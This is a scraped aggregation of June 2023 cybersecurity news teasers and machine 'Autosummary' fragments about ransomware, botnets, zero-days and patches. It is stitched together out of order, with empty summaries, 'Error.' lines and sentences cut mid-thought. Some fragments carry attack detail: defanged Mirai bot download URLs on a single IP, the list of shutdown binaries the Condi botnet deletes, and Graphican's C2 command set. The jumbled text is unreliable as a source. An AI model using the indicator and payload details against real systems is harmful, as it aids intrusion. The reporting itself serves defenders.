The threat actors tampered with the NSIS installer file “Super-Mario-Bros.exe,” the resulting executable file includes three separate executables: “super-mario-forever-v702e.exe,” which is the legitimate Super Mario game application, along with the malicious executables named “java.exe” and “atom.exe,” as shown below. "In this Help Net Security interview, Brett Harris, Cybersecurity Officer for the Americas at Siemens Healthineers, discusses the long-term impacts of cyberattacks on healthcare institutions and what healthcare providers can do to protect patients’ personal data and medical devices. Can you explain how the various hospital information systems (EHR, e-prescribing systems, practice management support systems, etc.) might be vulnerable to cyberattacks? Anything connected to a network is potentially vulnerable to cyberattacks, but the risk varies … More
The post Exploring the persistent threat of cyberattacks on healthcare appeared first on Help Net Security.
"Autosummary:
In this Help Net Security interview, Brett Harris, Cybersecurity Officer for the Americas at Siemens Healthineers, discusses the long-term impacts of cyberattacks on healthcare institutions and what healthcare providers can do to protect patients’ personal data and medical devices. Can you explain how the various hospital information systems (EHR, e-prescribing systems, practice management support systems, etc.) might be vulnerable to cyberattacks? "Autosummary:
"The adversary consistently employed ManageEngine Self-service Plus exploits to gain initial access, followed by custom web shells for persistent access, and living-off-the-land (LotL) techniques for lateral movement," the cybersecurity company said. "Autosummary:
The intrusions, which made use of residential proxy services to obfuscate the source IP address of the attacks, target governments, IT service providers, NGOs, defense, and critical manufacturing sectors, the tech giant"s threat intelligence team said. "Autosummary:
"At this time, we are not aware of any evidence that customer, supplier, or employee data has been compromised or misused as a result of this situation," reads the Suncord press release. "Autosummary:
Payloads retrieved from GitHub (ThreatFabric) Anatsa collects financial information such as bank account credentials, credit card details, payment information, etc., by overlaying phishing pages on the foreground when the user attempts to launch their legitimate bank app and also via keylogging. "Autosummary:
Simple JavaScript malware dropper In a report from cybersecurity company DeepInstinct, researchers note that the new PindOS malware dropper has only one function that comes with four parameters for downloading the payload, be it Bumblebee or the IcedID banking trojan that turned malware loader. "Autosummary:
Other victims that already disclosed breaches related to the MOVEit Transfer attacks include the U.S. state of Missouri, the U.S. state of Illinois, Zellis (along with its customers BBC, Boots, Aer Lingus, and Ireland"s HSE), Ofcam, the government of Nova Scotia, the American Board of Internal Medicine, and Extreme Networks. "The cyber attack suffered by Suncor Energy impacted payment operations at Petro-Canada gas stations in Canada. Suncor Energy is Canada’s leading integrated energy company that provides oil sands development, production and upgrading, offshore oil and gas, and petroleum refining in Canada and the U.S.. It owns the Petro-Canada retail and wholesale distribution networks. A cyber […]
The post Energy company Suncor suffered a cyber attack and its company Petro-Canada gas reported problems at its gas stations in Canada appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Petro-Canada) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Categories: Business Malvertising, the practice of using online ads to spread malware, can have dire consequences—and the problem only seems to be growing. |
The post Malvertising: A stealthy precursor to infostealers and ransomware attacks appeared first on Malwarebytes Labs.
"Autosummary:
Posted: June 26, 2023 by Malvertising, the practice of using online ads to spread malware, can have dire consequences—and the problem only seems to be growing. For organizations looking to nip the malvertising-ransomware connection in the bud, however, perhaps the biggest challenge is how hard malvertising can be to spot. "Categories: News Tags: IoT Tags: Linux Tags: OpenSSH Tags: trojan Tags: botnet Tags: IRC Tags: attack Tags: compromise Poorly configured Linux and Internet of Things (IoT) devices are at risk of compromise from a cryptojacking campaign. |
The post OpenSSH trojan campaign targets Linux systems and IoT devices appeared first on Malwarebytes Labs.
"Autosummary:
The data that is taken includes: Operating system version Network configuration The contents of /etc/passwd and /etc/shadow Open source rootkits are installed in systems which support them, used to further hide malicious files and processes taking place under the hood.The operating system giant has some specific advice for those who may be worried about this attack impacting their business: Harden internet-facing devices against attacks Ensure secure configurations for devices: Change the default password to a strong one, and block SSH from external access. "Autosummary:
This stolen data includes information stored in web browsers, like stored passwords and cookies containing session tokens, cryptocurrency wallets, and credentials and authentication tokens for Discord, Minecraft, Roblox, and Telegram. "Autosummary:
"Autosummary:
"Autosummary:
"Security researchers have uncovered a bug that could allow attackers to deliver malware directly into employees’ Microsoft Teams inbox. “Organisations that use Microsoft Teams inherit Microsoft’s default configuration which allows users from outside of their organisation to reach out to their staff members,” Jumpsec researcher Max Corbridge explained. With a social engineering pretext to prime the target, a malware delivery attack exploiting this vulnerability has a considerable chance of success. Bypassing security controls Many organizations … More
The post Microsoft Teams vulnerability allows attackers to deliver malware to employees appeared first on Help Net Security.
"Autosummary:
Change the security settings to only allow communication with certain allow-listed domains (if the number of organizations they need to keep in touch is small), and/or Educate staff on the possibility of productivity apps such as Teams, Slack or SharePoint being used by attackers to mount social engineering attacks Detecting attempts may prove difficult, since Microsoft currently doesn’t provide logs that cover potentially malicious events originating from external tenants, and using web proxy logs to alert on staff members accepting external message requests offers very limited insight, he added. "Autosummary:
"Autosummary:
Furthermore, it runs a modified version of ZiggyStarTux, an IRC-based distributed denial-of-service (DDoS) client that"s capable of executing bash commands issued from the command-and-control (C2) server. "Proof-of-concept (PoC) exploit code for the high-severity vulnerability (CVE-2023-20178) in Cisco Secure Client Software for Windows and Cisco AnyConnect Secure Mobility Client Software for Windows has been published. About the vulnerability Cisco Secure Client Software – previously known as Cisco AnyConnect Secure Mobility Client – is unified endpoint security software designed to assist businesses in expanding their network access capabilities and enabling remote employees to connect via both wired and wireless connections, including VPN. In … More
The post PoC exploit released for Cisco AnyConnect, Secure Client vulnerability (CVE-2023-20178) appeared first on Help Net Security.
"Autosummary:
About the vulnerability Cisco Secure Client Software – previously known as Cisco AnyConnect Secure Mobility Client – is unified endpoint security software designed to assist businesses in expanding their network access capabilities and enabling remote employees to connect via both wired and wireless connections, including VPN. "Autosummary:
"We have stolen 7TB of data, including confidential personal information from students and staff, research data, medical data, police reports, drug test results, databases, HR documents, finance documents, and more. "Autosummary:
The list of affected devices is extensive, as the zero-day affects older and newer models, and it includes: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation) "Autosummary:
docuseries on YouTube Contributors and those who provided new ransomware information and stories this week include: @demonslay335, @BleepinComputer, @fwosar, @serghei, @billtoulas, @Seifreed, @malwrhunterteam, @Ionut_Ilascu, @LawrenceAbrams, @NCCGroupplc, @NCSC, @pcrisk, @vxunderground, @AlvieriD, and @BrettCallow. "Categories: Business A quick look the cybercriminal group known as Royal—one of the fastest growing ransomware gangs today. |
The post 5 facts to know about the Royal ransomware gang appeared first on Malwarebytes Labs.
"Autosummary:
1. 66% of their initial access is done through phishing It seems there are three things certain in life: death, taxes, and phishing as a reliable attack vector.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Known Royal attacks up to May 2023 by country For comparison, 43% of all known ransomware attacks were on the USA in the same November 2022 to June 2023 time period.The Services, Wholesale, and Technology industries are their top victims When we look at Royal ransomware"s victimology, no overwhelming pattern stands out like it does for Vice Society. "Autosummary:
"Autosummary:
"It also identifies miner processes and files by their names and either terminates them or blocks access to them, and removes SSH access configured in authorized_keys by other adversaries," Microsoft said. "Autosummary:
Error. "Autosummary:
"Autosummary:
"The industry’s first-ever directory of virtual CISO (vCISO) service providers has gone live. This list of vCISO providers means that SMBs can tap the expertise of qualified cybersecurity professionals to protect their digital assets and ensure compliance. To help organizations shore up their cyberdefenses, MSPs, MSSPs, and consultancies have developed vCISO services. They enable businesses to avail themselves of the expertise and skills of a professional CISO to improve their cybersecurity posture, while only paying … More
The post vCISO Directory helps SMBs manage their cybersecurity appeared first on Help Net Security.
"Autosummary:
"Apple has released patches for three zero-day vulnerabilities (CVE-2023-32434, CVE-2023-32435, CVE-2023-32439) exploited in the wild. The first two have been reported by Kaspersky researchers Georgy Kucherin, Leonid Bezvershenko and Boris Larin following their discovery of the iOS spyware implant they dubbed TriangleDB, and the third one by an anonymous researcher. The vulnerabilities (CVE-2023-32434, CVE-2023-32435, CVE-2023-32439) CVE-2023-32439 is a type confusion issue in the WebKit browser engine that could be triggered by the vulnerable device processing … More
The post Apple fixes zero-day vulnerabilities used to covertly deliver spyware (CVE-2023-32435) appeared first on Help Net Security.
"Autosummary:
The vulnerabilities (CVE-2023-32434, CVE-2023-32435, CVE-2023-32439) CVE-2023-32439 is a type confusion issue in the WebKit browser engine that could be triggered by the vulnerable device processing maliciously crafted web content, and may lead to arbitrary code execution. "ChatGPT can be used to generate phishing sites, but could it also be used to reliably detect them? Security researchers have tried to answer that question. Can ChatGPT detect phishing sites based on URLs? Kaspersky researchers tested 5,265 (2322 phishing and 2943 safe) URLs. They asked ChatGPT (GPT-3.5) a simple question: “Does this link lead to a phish website?”. Based only on the form of the URL, the AI chatbot had a 87.2% detection rate … More
The post ChatGPT shows promise in detecting phishing sites appeared first on Help Net Security.
"Autosummary:
They also highlighted that ChatGPT was good at correctly identifying tactics like fake malware infection warnings, fake login errors, phishing SMS authentication request, and identifying domain names that are not legitimate, but occasionally failed to identify domain squatting and specific social engineering techniques, to recognize a legitimate domain name if it has multiple subdomains, etc. "Security teams are stretched, with not enough people, skills or budget to cope with all their priorities, according to Panaseer. Average cybersecurity budgets increase in 2023 The survey of over 400 cybersecurity decision makers and practitioners across the US and UK identified nearly one-third have concerns around a lack of security skills and lack of security training budget, and over one-quarter are worried about low security team headcount and low overall security budget. Yet adoption … More
The post Increased spending doesn’t translate to improved cybersecurity posture appeared first on Help Net Security.
"Autosummary:
Average cybersecurity budgets increase in 2023 The survey of over 400 cybersecurity decision makers and practitioners across the US and UK identified nearly one-third have concerns around a lack of security skills and lack of security training budget, and over one-quarter are worried about low security team headcount and low overall security budget. "Autosummary:
"Autosummary:
Another post-exploitation payload delivered alongside WispRider is a stealer module referred to as disk monitor (HPCustPartUI.dll) that stages files with predefined extensions (i.e., docx, mp3, wav, m4a, wma, aac, cda, and mid) for exfiltration. "Autosummary:
This includes "interacting with the device"s file system (including file creation, modification, exfiltration, and removal), managing processes (listing and termination), extracting keychain items to gather victim credentials, and monitoring the victim"s geolocation, among others. "The proof-of-concept (PoC) exploit code for high-severity vulnerability (CVE-2023-20178) in Cisco AnyConnect Secure was published online. A security researcher has published a proof-of-concept (PoC) exploit code for the high-severity vulnerability, tracked as CVE-2023-20178 (CVSS score of 7.8), impacting Cisco AnyConnect Secure Mobility Client and Secure Client for Windows. AnyConnect is a secure remote access VPN […]
The post Researchers released a PoC exploit for CVE-2023-20178 flaw in Cisco AnyConnect Secure appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, PoC exploit) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Norton parent firm, Gen Digital, was the victim of a ransomware attack that exploited the recently disclosed MOVEit zero-day vulnerability. Gen Digital Inc. (formerly Symantec Corporation and NortonLifeLock) is a multinational software company that provides cybersecurity software and services. The company owns multiple brands, including Norton, Avast, LifeLock, Avira, AVG, ReputationDefender, and CCleaner. Gen Digital said it was the victim of a ransomware attack, […]
The post Norton parent firm Gen Digital, was victim of a MOVEit ransomware attack too appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, zero-day) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Apple rolled out security updates to address actively exploited zero-day flaws in iOS, iPadOS, macOS, watchOS, and Safari. Apple addressed a set of vulnerabilities in iOS, iPadOS, macOS, watchOS, and the Safari browser that were actively exploited in the wild. The IT giant addressed the zero-day vulnerabilities, tracked as CVE-2023-32434 and CVE-2023-32435, exploited as part […]
The post Apple addressed actively exploited zero-day flaws in iOS, macOS, and Safari appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, zero-day) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On Today Apple released updates for CVE-2023-32434 (Kernel) and CVE-2023-32435 (WebKit) in-the-wild zero-days which were discovered by us (@kucher1n, @bzvr_ and yours truly) in the #iOSTriangulation attacks. "Autosummary:
"Autosummary:
"Autosummary:
Furthermore, if the attacker registers a domain similar to the target organizations on Microsoft 365, their messages could be made to appear as if they come from someone inside the organization, and not an external tenant, thus increasing the likelihood of the target downloading the file. "Autosummary:
" In today"s advisory, the U.S. intelligence agency recommended the following measures as additional mitigations: Apply the latest security updates, update recovery media, and activate optional mitigation Harden defensive policies by configuring endpoint security software to block BlackLotus malware installation attempts Use endpoint security products and firmware monitoring tools to monitor device integrity measurements and boot configuration Customize UEFI Secure Boot to block older (pre-January 2022), signed Windows boot loaders BlackLotus has been used in attacks targeting Windows 10 and 11 to exploit a vulnerability (referred to as Baton Drop and tracked as CVE-2022-21894) found in older boot loaders (aka boot managers) which helps bypass Secure Boot protection and trigger a series of malicious actions designed to compromise system security. "Since March 2023, Unit 42 researchers have observed a variant of the Mirai botnet spreading by targeting tens of flaws in D-Link, Zyxel, and Netgear devices. Since March 2023, researchers at Palo Alto Networks Unit 42 have observed a new variant of the Mirai botnet targeting multiple vulnerabilities in popular IoT devices. Below is the […]
The post New Mirai botnet targets tens of flaws in popular IoT devices appeared first on Security Affairs.
"Autosummary:
Upon executing the script, it would download and execute the proper bot clients for the specific Linux architectures: hxxp://185.225.74[.]251/armv4l hxxp://185.225.74[.]251/armv5l hxxp://185.225.74[.]251/armv6l hxxp://185.225.74[.]251/armv7l hxxp://185.225.74[.]251/mips hxxp://185.225.74[.]251/mipsel hxxp://185.225.74[.]251/sh4 hxxp://185.225.74[.]251/x86_64 hxxp://185.225.74[.]251/i686 hxxp://185.225.74[.]251/i586 hxxp://185.225.74[.]251/arc hxxp://185.225.74[.]251/m68k hxxp://185.225.74[.]251/sparc Once executed the bot client, the shell script downloader will delete the client executable file to avoid detection. "Categories: Business Dive into where we prevented more than the rest and how we were able to do it. |
The post Malwarebytes only vendor to win every MRG Effitas award in 2022 & 2023 appeared first on Malwarebytes Labs.
"Autosummary:
MRG Effitas assesses a product"s ability to meet today’s most pressing threats, including stopping zero-day malware, ransomware, exploits, and more—and doing so with speedy performance and low false positives. 100% of zero-day threats blocked One of the many strong suits of our detection is that it can detect malware that has never been seen before, also called zero-day malware. "Categories: Personal Tags: UPS Tags: delivery Tags: scam Tags: phish Tags: phishing Tags: smishing Tags: SMS Tags: text Tags: fake Tags: data UPS is warning Canadian customers of potential phishing attempts after data was left accessible via look-up tool. |
The post UPS warns customers of phishing attempts after data accessed appeared first on Malwarebytes Labs.
"Autosummary:
The letter goes on to mention that an internal review took place to see if information it received from shippers was somehow contributing to these attempts taking place: During that review, UPS discovered a method by which a person who searched for a particular package or misused a package look-up tool could obtain more information about the delivery, potentially including a recipient"s phone number. In terms of the data potentially accessed: The information available through the package look up tools included the recipient’s name, shipment address, and potentially phone number and order number.Posted: June 22, 2023 by UPS is warning Canadian customers of potential phishing attempts after data was left accessible via look-up tool. "Categories: Apple Categories: Exploits and vulnerabilities Categories: News Tags: Apple Tags: kernel webkit Tags: CVE-2023-32434 Tags: CVE-2023-32435 Tags: CVE-2023-32439 Tags: type confusion Tags: integer overflow Tags: operation triangulation Apple has released security updates for several products to address a set of flaws it said were being actively exploited. |
The post Update now! Apple fixes three actively exploited vulnerabilities appeared first on Malwarebytes Labs.
"Autosummary:
CVE-2023-32435: a memory corruption issue in the WebKit component for iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation).If the number is used to set the length of a data buffer (an area of memory used to hold data), an integer overflow can lead to a buffer overflow, a vulnerability that allows an attacker to overloaded a buffer with more data than it"s expecting, which creates a route for the attacker to manipulate the program. "VMware is warning customers that critical remote code execution vulnerability CVE-2023-20887 is being actively exploited in attacks. VMware is warning customers that a critical remote code execution vulnerability in Aria Operations for Networks (Formerly vRealize Network Insight), tracked as CVE-2023-20887, is being actively exploited in the wild. “VMware has confirmed that exploitation of CVE-2023-20887 has […]
The post Critical RCE flaw CVE-2023-20887 in VMware vRealize exploited in the wild appeared first on Security Affairs.
"Autosummary:
"Autosummary:
The complete list of commands that the C2 can send for execution by Graphican are: "C" — Create an interactive command line that is controlled from the C&C server — Create an interactive command line that is controlled from the C&C server "U" — Create a file on the remote computer — Create a file on the remote computer "D" — Download a file from the remote computer to the C&C server — Download a file from the remote computer to the C&C server "N" — Create a new process with a hidden window — Create a new process with a hidden window "P" — Create a new PowerShell process with a hidden window and saves the results in a temporary file in the TEMP folder, and sends the results to the C&C server Other tools Symantec"s researchers observed in APT15"s latest campaign are: EWSTEW – Custom APT15 backdoor extracting emails from infected Microsoft Exchange servers. APT15, also known as Nickel, Flea, Ke3Chang, and Vixen Panda, are Chinese state hackers targeting important public and private organizations worldwide since at least 2004. "CVE-2023-20887, a pre-authentication command injection vulnerability in VMware Aria Operations for Networks (formerly vRealize Network Insight), has been spotted being exploited in the wild. There are no workarounds to mitigate the risk of exploitation – enterprise admins are advised to upgrade their deployments with patches. CVE-2023-20887 exploited CVE-2023-20887 is one of three vulnerabilities recently discovered by Sina Kheirkhah of Summoning Team and an anonymous researcher and privately reported to VMware. “A malicious actor with network … More
The post VMware Aria Operations for Networks vulnerability exploited in the wild (CVE-2023-20887) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
To get around this limitation, the malware deletes multiple binaries that are used to shut down or reboot the system - /usr/sbin/reboot /usr/bin/reboot /usr/sbin/shutdown /usr/bin/shutdown /usr/sbin/poweroff /usr/bin/poweroff /usr/sbin/halt /usr/bin/halt Condi, unlike some botnets which propagate by means of brute-force attacks, leverages a scanner module that checks for vulnerable TP-Link Archer AX21 devices and, if so, executes a shell script retrieved from a remote server to deposit the malware. "Autosummary:
"Autosummary:
Error. "Autosummary:
Excellent philosophy for the security team [...] its just awesome too many security teams view security as an exclusive tradeoff between team operating power and security" Hidden friction Sometimes, when introducing new security controls, you are making a well considered tradeoff between security and user experience.When we do quarterly planning, my team categorizes our goals within four evergreen outcomes: Reduce the risk of information security incidents Increase trust in Vanta"s information security program Reduce the friction caused by information security controls Use security expertise to support the business In this article, I"m going to focus on number three: reducing friction. "Autosummary:
"Autosummary:
The list of affected devices is quite extensive, as the zero-day affects older and newer models, and it includes: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, iPad mini 5th generation and later iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation) "Autosummary:
" UPS customers worldwide have been affected by these phishing attacks, as shown by online reports showing the threat actors using their names, phone numbers, and postal codes, as well as info on recent orders. "Autosummary:
It doesn"t end there, for AblyGo is used as a conduit to ultimately execute an information stealer malware dubbed FadeStealer that comes with various features to take screenshots, gather data from removable media and smartphones, log keystrokes, and record microphone. "Autosummary:
" iOttie has not shared how many customers were impacted but said that names, personal information, and payment information could have been stolen, including financial account numbers, credit and debit card numbers, security codes, access codes, passwords, and PINs. "Autosummary:
"Autosummary:
In the past, the hackers were known to utilize custom malware called "Dolphin" and "M2RAT" to execute commands and steal data, credentials, and screenshots from Windows devices and even connected mobile phones. "Categories: Business Categories: News Tags: students Tags: university Tags: university of Manchester Tags: UoM Tags: ransomware Tags: blackmail Tags: theft Tags: pressure Tags: leak Tags: breach We take a look at one group"s creative tactics to ensure a payout from a compromised university. |
The post Ransomware attackers email bemused students as leverage for a payout appeared first on Malwarebytes Labs.
"Autosummary:
As a result, emails like the below are being sent to students: We have stolen 7TB of data, including confidential personal information from students and staff, research data, medical data, police reports, drug test results, databases, HR documents, finance documents, and more.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.At time of writing, its cyber incident update page still makes no mention of it: During the week commencing 6 June, we found out that the University is the victim of a cyber incident. The incident, first discovered on June 6th, involved the likely theft of data by an unauthorised party. "From bogus free trips to fake rental homes, here are some of the most common online threats you should look out for both before and during your travels
The post Going on vacation soon? Stay one step ahead of travel scammers appeared first on WeLiveSecurity
"Autosummary:
pic.twitter.com/1Fw0PUE3Gj — Trading Standards NI (@TSSNI) August 22, 2022 2) Clone sites Phishing emails, texts, and calls and/or online ads might also lure victims into visiting fake airline, vacation or comparison sites designed to impersonate legitimate ones.pic.twitter.com/tTDOUlPubL — NI Cyber Security Centre (@NICyberSC) August 3, 2020 3) Discounted tickets/vacations Cybercriminals sometimes offer heavily discounted deals on vacations, flights, hotels and other packages. According to the UK travel agent trade association ABTA, the most common types of holiday booking fraud involve accommodation, airline tickets, sports and religious trips, and timeshares and vacation clubs. 4) ‘Help’ with international travel documents Some sites purport to help victims secure a travel visa, passport, international driving permit, or other documents. "Malwarebytes launched the Malwarebytes Reseller Partner Program. The revamped program is dedicated to helping partners create profitable and consistent business growth through innovative endpoint security solutions and leading channel incentives such as lucrative base and multi-year discounts. “Today’s evolving threat landscape means that organizations are leaning on their partners to be their trusted IT advisors and cybersecurity experts more than ever before,” said Jason Coville, Chief Sales Officer, Malwarebytes. “We believe it is critical to … More
The post Malwarebytes launches Reseller Partner Program to drive partner profitability appeared first on Help Net Security.
"Autosummary:
“At Malwarebytes, if it doesn’t work for our channel partners, it doesn’t work for us,” said Philip Walsh, Channel Account Sales Leader, EMEA. "Zyxel has released firmware patches for a critical vulnerability (CVE-2023-27992) in some of its consumer network attached storage (NAS) devices. About CVE-2023-27992 CVE-2023-27992 is an OS command injection flaw that could be triggered remotely by an unauthenticated attacker, via a specially crafted HTTP request. It affects the following Zyxel NAS devices: NAS326 – firmware versions prior to V5.21(AAZF.14)C0 NAS540 – firmware versions prior to V5.21(AATB.11)C0 NAS542 – firmware versions prior to V5.21(ABAG.11)C0 Andrej Zaujec, National … More
The post Zyxel patches critical vulnerability in NAS devices (CVE-2023-27992) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The list of impacted products are GT6, GT-AXE16000, GT-AX11000 PRO, GT-AXE11000, GT-AX6000, GT-AX11000, GS-AX5400, GS-AX3000, XT9, XT8, XT8 V2, RT-AX86U PRO, RT-AX86U, RT-AX86S, RT-AX82U, RT-AX58U, RT-AX3000, TUF-AX6000, and TUF-AX5400. "Autosummary:
"Autosummary:
Upon success, Rorschach ransomware, for example, can create a Group Policy that deploys the ransomware to every machine in the domain, even if the attack initially targets only one machine. With data breaches being common, using multiple methods, such as a time-based one-time (TOTP) number or a biometric factor like a fingerprint, will make an attacker"s job much harder.Multi-Factor Authentication (MFA) Account compromises can occur, but layering on two-factor (2FA) or multi-factor authentication can help mitigate this risk. "Autosummary:
Upon activation, RDStealer enters an infinite loop of calling the "diskMounted" function, which checks for the availability of the C, D, E, F, G, or H drives on the \\tsclient network shares. The Remote Desktop Protocol includes a feature called "device redirection," which allows you to connect your local drives, printers, the Windows clipboard, ports, and other devices with the remote host, which are then accessible in your remote desktop sessions. "Autosummary:
In these attacks, the cyber-espionage group (also known as BlueDelta, Fancy Bear, Sednit, and Sofacy) leveraged news about the ongoing conflict between Russia and Ukraine to trick recipients into opening malicious emails that would exploit Roundcube Webmail vulnerabilities to hack into unpatched servers. "Autosummary:
Victims distribution (Group-IB) Information stealers are a malware category that targets account data stored on applications such as email clients, web browsers, instant messengers, gaming services, cryptocurrency wallets, and others. "Cymulate released a new solution for organizations to run an informed continuous threat exposure management (CTEM) program. The CTEM program, which was coined by Gartner is designed to diagnose the severity of exposures, create an action plan for remediation and facilitate a common language for discussions between business and technical teams. Disparate data sources, point-in-time collection, and lack of business context create challenges for cybersecurity teams to ingest and contextualize exposure data and translate it … More
The post Cymulate Exposure Analytics provides users with an attacker’s view of their cyber resilience appeared first on Help Net Security.
"Autosummary:
Correlated analysis from Cymulate and multi-vendor data that assesses on-premises and cloud attack surfaces, risky assets, attack paths, vulnerabilities, and business impact : Correlated analysis from Cymulate and multi-vendor data that assesses on-premises and cloud attack surfaces, risky assets, attack paths, vulnerabilities, and business impact Prioritization : Vulnerability prioritization & remediation guidance based on multi-vendor aggregated data that is normalized, contextualized, and evaluated against breach feasibility : Vulnerability prioritization & remediation guidance based on multi-vendor aggregated data that is normalized, contextualized, and evaluated against breach feasibility Validation : Analyze exposure severity, security integrity, and effectiveness of remediation from security validation assessment data.Mobilization: Utilize Cymulate contextualized data to understand various response outcome options, and establish and track performance against baselines, benchmarks, and risk profiles “Cymulate has always taken an attacker’s view on cybersecurity defense, and through our experience in breach and attack simulation we have carefully studied the ways attackers creatively exploit vulnerabilities and other exposures driven by human error, misconfiguration, or control weaknesses,” said Avihai Ben-Yossef, CTO of Cymulate. "Black Kite released automated cyber risk quantification (CRQ) modeling for ransomware and business interruption scenarios. The new capabilities, which automates FAIR methodology, extends Black Kite’s data breach CRQ model to now provide visibility into all third-party risk scenarios, adds environmental, social, and corporate governance (ESG) factors and makes it possible to continuously monitor supply chain risk. “Cyber risk quantification provides deeper and more useful insights than a mere security score or rating. Yet, getting it … More
The post Black Kite releases two modeling solutions for ransomware and business interruption scenarios appeared first on Help Net Security.
"Autosummary:
With the launch of two new modeling solutions for ransomware and business interruption scenarios, Black Kite now offers an expanded suite of capabilities to augment its existing risk management offerings: Ransomware scenario modeling : With automated cyber risk quantification modeling for ransomware incidents, customers gain the ability to simulate and analyze the potential consequences of ransomware attacks, allowing for proactive measures and effective response strategies to safeguard critical assets and minimize financial losses. "Autosummary:
"Autosummary:
" Thus when a new RDP client connection is detected, commands are issued by RDStealer to exfiltrate sensitive data, such as browsing history, credentials, and private keys from apps like mRemoteNG, KeePass, and Google Chrome. "Autosummary:
Tsunami botnet"s source code (ASEC) Besides SYN, ACK, UDP, and random flood DDoS attacks, Tsunami also supports an extensive set of remote control commands, including shell command execution, reverse shells, collecting system information, updating itself, and downloading additional payloads from an external source. "Autosummary:
Because Condi doesn"t have a persistence mechanism to survive between device reboots, its authors decided to equip it with a wiper for the following files, which prevents the devices from being shut down or restarted: /usr/sbin/reboot /usr/bin/reboot /usr/sbin/shutdown /usr/bin/shutdown /usr/sbin/poweroff /usr/bin/poweroff /usr/sbin/halt /usr/bin/halt For propagation to vulnerable TP-Link routers, the malware scans for public IPs with open ports 80 or 8080 and sends a hardcoded exploitation request to download and execute a remote shell script that infects the new device. "Autosummary:
"Autosummary:
"Categories: Business Tags: reddit Tags: ransom Tags: black cat Tags: ransomware Tags: extortion Tags: blackmail Tags: data Tags: leak Tags: breach We take a look at news that data stolen from Reddit may be leaked soon unless the site pays a cool $4.5m to keep it offline. |
The post Black Cat ransomware group wants $4.5m from Reddit or will leak stolen files appeared first on Malwarebytes Labs.
"Autosummary:
The employee"s credentials were reportedly used to gain access to "some internal docs, code, as well as some internal dashboards and business systems", which exposed "limited contact information" for company contacts and employees, and information about advertisers.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.The February attack, billed as a “sophisticated phishing campaign” by Reddit, involved an attempt to swipe credentials and two-factor authentication tokens. "In this Help Net Security round-up, we present parts of previously recorded videos from experts in the field that discuss about how AI technologies will impact the cybersecurity industry in the next few years. AI is a powerful tool in cybersecurity, adapting to emerging threats by analyzing data and improving detection. However, ethical considerations, privacy, and adversarial attacks must be addressed to maintain trust. AI will continue to play a vital role in safeguarding digital … More
The post Exploring the role of AI in cybersecurity appeared first on Help Net Security.
"Autosummary:
"Organizations that closely align their cybersecurity programs to business objectives are 18% more likely to achieve target revenue growth and market share and improve customer satisfaction, as well as 26% more likely to lower the cost of cybersecurity breaches/incidents, on average, according to Accenture. Driving successful outcomes The report identifies a group of companies that are leading the way in their cybersecurity efforts. These companies — which Accenture calls “cyber transformers” and account for 30% … More
The post Three cybersecurity actions that make a difference appeared first on Help Net Security.
"Autosummary:
Cyber transformers integrate a cyber risk-based framework into their enterprise risk management program; have their cybersecurity operations and executive leadership agree on the priority of assets and operations to be protected; and consider cybersecurity risk to a great extent when evaluating overall enterprise risk (65% vs. 11%). "Autosummary:
Join the Session Besides using Mimikatz for credential theft, the threat actor"s modus operandi stands out for utilizing other novel methods to steal passwords, conduct lateral movement, and exfiltrate sensitive data, such as - Using network providers to execute a malicious DLL to harvest and export plaintext passwords to a remote server leveraging an open-source penetration testing toolset called Yasso to spread across the network, and Taking advantage of the Exchange Management Shell and PowerShell snap-ins to harvest emails of interest It"s worth pointing out that the use of Exchange PowerShell snap-ins to export mailbox data has been previously reported in the case of a Chinese state-sponsored group dubbed Silk Typhoon (formerly Hafnium), which first came to light in March 2021 in connection with the exploitation of Microsoft Exchange Server. "Microsoft has confirmed that recent outages to its popular services, including Outlook, Teams, OneDrive, and cloud computing platform Azure, were caused by a DDoS attack by a threat actor that the company tracks as Storm-1359.
Also known as Anonymous Sudan, Storm-1359 was first detected in January, targeting organizations and government agencies with DDoS attacks and efforts to exfiltrate data. The threat actor was initially assumed to be a “hacktivist” group protesting a controversial outfit at the Melbourne Fashion Week but has since been linked to the Russian state, according to several media reports.
Autosummary:
Different types of layer 7 DDoS attacks Storm-1359 was observed launching several types of layer 7 DDoS attack traffic, including HTTP(S) flood attack, Cache bypass, and Slowloris. "ESET expanded its unified cybersecurity platform, ESET PROTECT, with a new subscription tier for businesses requiring all-in-one prevention, detection and response. Available immediately, ESET PROTECT Elite delivers enterprises, small and midsize businesses (SMBs), and channel partners with enterprise-grade XDR for increased visibility and threat-hunting capabilities. The comprehensive offering combines multilayered endpoint protection with multi-factor authentication, server security, advanced threat defense, full disk encryption, mail security and cloud application protection. Leveraging ESET’s 30 years of cutting-edge … More
The post ESET PROTECT Elite protects users against ransomware and zero-day threats appeared first on Help Net Security.
"Autosummary:
